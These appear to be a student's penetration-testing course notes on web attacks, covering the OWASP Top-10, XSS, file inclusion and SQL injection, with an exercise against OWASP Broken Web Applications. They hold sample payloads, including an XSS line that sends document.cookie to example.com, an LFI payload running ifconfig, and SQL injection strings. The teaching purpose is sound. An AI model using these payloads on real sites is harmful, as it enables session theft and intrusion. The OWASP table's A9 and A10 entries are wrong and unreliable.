boris/G4G0-2
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
Files
ad2e60931aece28c03de28bae86f0bf919cd6332
G4G0-2/Penetration Testing/Week 22/Week 22 - Web Attacks.md
boris ae837183f1 vault backup: 2025-03-16 18:59:42
2025-03-16 18:59:42 +00:00

3.2 KiB
Raw Blame History

Slide 1: Web Application Attacks

  • Web applications can be written in various languages, each with its specific vulnerability classes.
  • Main attack vectors are similar in concept.
  • OWASP promotes security awareness and solutions for web application development.

Slide 2: OWASP Top-10 Security Risks

Risk Description
A1:2017 - Injection Attacker can add malicious SQL, NoSQL, or command strings.
A2:2017 - Broken Authentication Compromised credentials, weak defaults, or exposed keys.
A3:2017 - Sensitive Data Exposure Unprotected data at rest or in transit.
A4:2017 - XML External Entity (XXE) Attacker can exploit parsing of XML outside the standard.
A5:2017 - Security Misconfiguration Default configurations, open cloud storage, misconfigured HTTP headers.
A6:2017 - Using Components with Known Vulnerabilities Outdated or vulnerable libraries and frameworks.
A7:2017 - Insufficient Logging & Monitoring Lack of logging and monitoring prevents detection of attacks.
A8:2017 - Insecure Deserialization Vulnerable deserialization can lead to remote code execution.
A9:2017 - Using Known Vulnerable Components without Patching Outdated software with known vulnerabilities.
A10:2017 - Insufficient Transport Layer Protection Weak or no encryption, allowing man-in-the-middle attacks.

Slide 3: Cross-Site Scripting (XSS)

  • Unsanitized user input displayed as HTML.
  • Allows malicious scripts to run in victim's browser.
    • Reflected (non-persistent): injected script runs immediately when the victim clicks the link.
    • Stored (persistent): web application delivers payload to the victim, script runs when viewed.
  • Impact: cookie stealing, authentication bypass, redirection.

Slide 4: XSS Example

  • Reflected XSS:
<h1>XSS demo</h1>
<?php echo "Hello ". $_GET['name'];?>
  • Stored XSS:
<script>alert(1)</script>

Slide 5: Cookie Stealing via XSS

  • JavaScript can make victim's browser send cookies to the attacker.
new Image().src="http://example.com/bogus.php?output="+document.cookie;

Slide 6: File Inclusion Vulnerabilities

  • Local File Inclusion (LFI) and Remote File Inclusion (RFI):
    • LFI: includes local files.
    • RFI: introduces own code to the webserver.
  • Exploit depends on PHP versions and web server configurations.

Slide 7: LFI Demonstration

  • Unsanitized lang parameter:
<?php $lang=$_GET['lang']; include $lang.".php";?>
  • Payload:
../uploads/avatars/image.jpg%00&cmd=ifconfig

Slide 8: SQL Injection

  • Unsanitized user input passed to a database query.
  • Manipulating data can change the nature of the query.
  • Examples:
    • Bypassing authentication with ' OR '1'='1
    • Extracting data using ' union select * from information_schema.columns --

Exercise:

  • Using OWASP Broken Web Applications project, demonstrate obtaining a shell with:
    • An LFI vulnerability in the web application with file upload.
    • An LFI vulnerability in the web application with contaminated logs.
    • An RFI vulnerability in the web application.
  • Demonstrate attacks using SQL injection and Cross Site Scripting (XSS).
  • Provide documentation and proof of useful attacks in your report.